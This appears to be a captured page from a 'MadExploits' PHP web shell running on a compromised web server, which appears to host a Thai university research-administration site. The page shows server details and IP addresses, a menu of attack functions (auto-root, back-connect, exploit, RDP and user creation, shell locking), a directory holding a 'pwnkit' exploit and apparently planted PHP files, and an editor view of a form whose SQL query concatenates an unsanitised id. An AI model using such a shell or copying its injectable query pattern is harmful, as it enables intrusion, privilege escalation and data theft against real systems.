Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
ris /
mods /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin_act.php
2.88
KB
-rw-r--r--
admin_frm.php
2.6
KB
-rw-r--r--
admin_lst.php
2.56
KB
-rw-r--r--
faculty_act.php
2.79
KB
-rw-r--r--
faculty_frm.php
2.13
KB
-rw-r--r--
faculty_lst.php
2.49
KB
-rw-r--r--
fund_act.php
3.64
KB
-rw-r--r--
fund_frm.php
4.39
KB
-rw-r--r--
fund_lst.php
2.81
KB
-rw-r--r--
innovation_act.php
4.03
KB
-rw-r--r--
innovation_frm.php
5.63
KB
-rw-r--r--
innovation_lst.php
5.11
KB
-rw-r--r--
journal_act.php
2.79
KB
-rw-r--r--
journal_frm.php
2.13
KB
-rw-r--r--
journal_lst.php
2.57
KB
-rw-r--r--
login_act.php
2.04
KB
-rw-r--r--
login_frm.php
1.3
KB
-rw-r--r--
manager-Pipeline.php
584
B
-rw-r--r--
publication_act.php
4.05
KB
-rw-r--r--
publication_frm.php
6.14
KB
-rw-r--r--
publication_lst.php
5.07
KB
-rw-r--r--
publishdb_act.php
2.91
KB
-rw-r--r--
publishdb_frm.php
2.99
KB
-rw-r--r--
publishdb_lst.php
2.89
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
research2_frm.php
8.94
KB
-rw-r--r--
research_act.php
4.21
KB
-rw-r--r--
research_frm.php
9.28
KB
-rw-r--r--
research_lst.php
5.12
KB
-rw-r--r--
researcher_act.php
3.75
KB
-rw-r--r--
researcher_frm.php
4.29
KB
-rw-r--r--
researcher_lst.php
5.09
KB
-rw-r--r--
sanitizer-Client.php
584
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : publishdb_frm.php
<div class="w3-white w3-padding"> <h3><i class="fa fa-university" aria-hidden="true"></i> ฐานข้อมูลตีพิมพ์</h3> <center> <div class="w3-padding w3-left-align" style="width: 500px;"> <?php $row = new stdClass(); if ($id!='') { $sql = "SELECT * FROM publishdb WHERE id='".$id."' "; $row = $g_db->getObject($sql); echo '<h4 class="w3-center w3-text-orange">แก้ไขฐานข้อมูลตีพิมพ์<br>('.$row->name.')</h4>'; }else{ $sql = "SELECT ordering FROM publishdb WHERE 1 ORDER BY ordering DESC LIMIT 0, 1 "; $ordering = $g_db->getValue($sql); $row->ordering = ($ordering>0)?($ordering+1):'1'; $row->level = 1; echo '<h4 class="w3-center w3-text-green">เพิ่มชื่อฐานข้อมูลตีพิมพ์</h4>'; } ?> <div class="w3-padding"> ลำดับที่: <span class="w3-text-red">*</span> <input id="ordering" name="ordering" value="<?=$g_util->toHTMLView($row->ordering)?>" class="w3-input w3-border w3-text-indigo" required> </div> <div class="w3-padding"> ชื่อฐานข้อมูลตีพิมพ์: <span class="w3-text-red">*</span> <input id="name" name="name" value="<?=$g_util->toHTMLView($row->name)?>" class="w3-input w3-border w3-text-indigo" required> </div> <div class="w3-padding"> ระดับ: <span class="w3-text-red">*</span> <input type="radio" name="level" value="1" class="w3-radio w3-text-indigo" <?=($row->level=="1")?' checked':''?>> ระดับชาติ <input type="radio" name="level" value="2" class="w3-radio w3-text-indigo" <?=($row->level=="2")?' checked':''?>> ระดับนานาชาติ </div> <div class="w3-padding"> ค่าน้ำหนัก: <span class="w3-text-red">*</span> <input id="weight" name="weight" value="<?=$g_util->toHTMLView($row->weight)?>" class="w3-input w3-border w3-text-indigo" required> </div> <div class="w3-padding w3-center"> <input type="submit" name="bt_submit" value="บันทึก" class="w3-button w3-green w3-round" /> <a href="admin.php?mod=publishdb_lst" class="w3-button w3-grey w3-round">กลับ</a> </div> </div> </center> <p> </p> <input type="hidden" name="mod" value="publishdb_act"> <input type="hidden" name="do" value="<?=($id=='')?'save':'update'?>"> <input type="hidden" name="id" value="<?=$id?>"> <input type="hidden" name="kw" value="<?=$kw?>"> <input type="hidden" name="ordering1" value="<?=$row->ordering?>"> <script language="JavaScript"> var frmvalidator = new Validator("frm_main"); frmvalidator.addValidation("ordering","req","กรุณาระบุ ลำดับที่"); frmvalidator.addValidation("name","req","กรุณาระบุ ชื่อคณะ"); //--> </script>
Close